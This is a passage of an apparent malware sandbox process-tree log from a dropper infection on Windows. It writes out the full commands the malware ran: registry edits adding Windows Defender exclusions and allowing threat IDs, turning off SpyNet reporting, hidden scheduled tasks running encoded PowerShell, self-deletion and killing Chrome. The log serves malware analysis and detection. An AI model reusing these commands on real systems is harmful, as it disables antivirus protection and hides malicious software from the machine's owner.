C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 532 -s 11327⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 532 -s 11567⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 532 -s 11967⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 532 -s 12687⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 532 -s 13447⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\S0mjV8kxlJkIt5WHSdw4FyQw.exe"C:\Users\Admin\Pictures\Adobe Films\S0mjV8kxlJkIt5WHSdw4FyQw.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS584A.tmp\Install.exe.\Install.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS6FBA.tmp\Install.exe.\Install.exe /S /site_id "525403"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxYuVYNqs" /SC once /ST 06:59:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxYuVYNqs"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxYuVYNqs"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bnHoQpKIlSSCUFQrDN" /SC once /ST 11:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qXPJNMcRbBFEeomOU\igHnmwfRSHoqfpr\bmQJtyn.exe\" Sk /site_id 525403 /S" /V1 /F9⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\4GH1eUKzRccr8EdKp64_qmk6.exe"C:\Users\Admin\Pictures\Adobe Films\4GH1eUKzRccr8EdKp64_qmk6.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\uHk61GN7Gby0LzvBe2zXGGJL.exe"C:\Users\Admin\Pictures\Adobe Films\uHk61GN7Gby0LzvBe2zXGGJL.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\uHk61GN7Gby0LzvBe2zXGGJL.exe"C:\Users\Admin\Pictures\Adobe Films\uHk61GN7Gby0LzvBe2zXGGJL.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\xYSE4t1bAahNsp7m6Yi1zXDI.exe"C:\Users\Admin\Pictures\Adobe Films\xYSE4t1bAahNsp7m6Yi1zXDI.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\8v6l9R_z0Xilpw1Rhgh6CwhD.exe"C:\Users\Admin\Pictures\Adobe Films\8v6l9R_z0Xilpw1Rhgh6CwhD.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\FXmWnCZXXUM_ZK6RVocu5tD2.exe"C:\Users\Admin\Pictures\Adobe Films\FXmWnCZXXUM_ZK6RVocu5tD2.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\jsO7dL6oWz2DHLgBjIAv4UFJ.exe"C:\Users\Admin\Pictures\Adobe Films\jsO7dL6oWz2DHLgBjIAv4UFJ.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im jsO7dL6oWz2DHLgBjIAv4UFJ.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\jsO7dL6oWz2DHLgBjIAv4UFJ.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im jsO7dL6oWz2DHLgBjIAv4UFJ.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\_QgXA65A1rFOh_D_z2nP51AX.exe"C:\Users\Admin\Pictures\Adobe Films\_QgXA65A1rFOh_D_z2nP51AX.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im _QgXA65A1rFOh_D_z2nP51AX.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\_QgXA65A1rFOh_D_z2nP51AX.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im _QgXA65A1rFOh_D_z2nP51AX.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\rEDoQSnoRad92QLv2nJZu2Q3.exe"C:\Users\Admin\Pictures\Adobe Films\rEDoQSnoRad92QLv2nJZu2Q3.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 457⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 458⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\Rkeagtomax1.exe"C:\Users\Admin\AppData\Local\Temp\Rkeagtomax1.exe"7⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe7⤵
-
C:\Users\Admin\Pictures\Adobe Films\DujwSDGj6rBy6VBkaH4v2_l5.exe"C:\Users\Admin\Pictures\Adobe Films\DujwSDGj6rBy6VBkaH4v2_l5.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\IuB9lXIpkiGXkx4KjSXWaIxx.exe"C:\Users\Admin\Pictures\Adobe Films\IuB9lXIpkiGXkx4KjSXWaIxx.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\v9TVPfVJzB8QNFTNNg1v1AXM.exe"C:\Users\Admin\Pictures\Adobe Films\v9TVPfVJzB8QNFTNNg1v1AXM.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02976fcdf1.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\Tue02976fcdf1.exeTue02976fcdf1.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0289c99651.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\Tue0289c99651.exeTue0289c99651.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4056 -s 5724⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue029560e6534e190c.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue026e182673.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02b2110095fe706.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02705f9c2b455.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue026e94a5005f8.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02dc626f48.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue028a363eda.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02522f9ea0b1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\Tue029560e6534e190c.exeTue029560e6534e190c.exe1⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 672 -s 9322⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\Tue02522f9ea0b1.exeTue02522f9ea0b1.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\Tue028a363eda.exeTue028a363eda.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\Tue02705f9c2b455.exeTue02705f9c2b455.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\Tue026e182673.exeTue026e182673.exe /mixone1⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 6562⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 6922⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 6602⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 8162⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 8722⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 8442⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 11162⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 12922⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 13042⤵
- Suspicious use of SetThreadContext
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 13162⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\Tue02b2110095fe706.exeTue02b2110095fe706.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-OQ4GF.tmp\Tue02b2110095fe706.tmp"C:\Users\Admin\AppData\Local\Temp\is-OQ4GF.tmp\Tue02b2110095fe706.tmp" /SL5="$60058,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\Tue02b2110095fe706.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\Tue02dc626f48.exeTue02dc626f48.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\Tue026e94a5005f8.exeTue026e94a5005f8.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\Tue026e94a5005f8.exeC:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\Tue026e94a5005f8.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\cehsfcsC:\Users\Admin\AppData\Roaming\cehsfcs1⤵
- Executes dropped EXE
-
C:\Windows\System32\IME\SHARED\imebroker.exeC:\Windows\System32\IME\SHARED\imebroker.exe -Embedding1⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Loads dropped DLL
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\ImmersiveControlPanel\SystemSettings.exe"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Users\Admin\AppData\Local\Temp\qXPJNMcRbBFEeomOU\igHnmwfRSHoqfpr\bmQJtyn.exeC:\Users\Admin\AppData\Local\Temp\qXPJNMcRbBFEeomOU\igHnmwfRSHoqfpr\bmQJtyn.exe Sk /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CgqbhrirU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CgqbhrirU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LBHdSxvSsGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LBHdSxvSsGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LHKJFdwYUyvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LHKJFdwYUyvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eRTwotBbzMFkBZRkNbR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eRTwotBbzMFkBZRkNbR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qSPWXtASFZsjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qSPWXtASFZsjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\HxJeplZVKRnYAfVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\HxJeplZVKRnYAfVB\" /t REG_DWORD /d 0 /reg:64;REG ADD 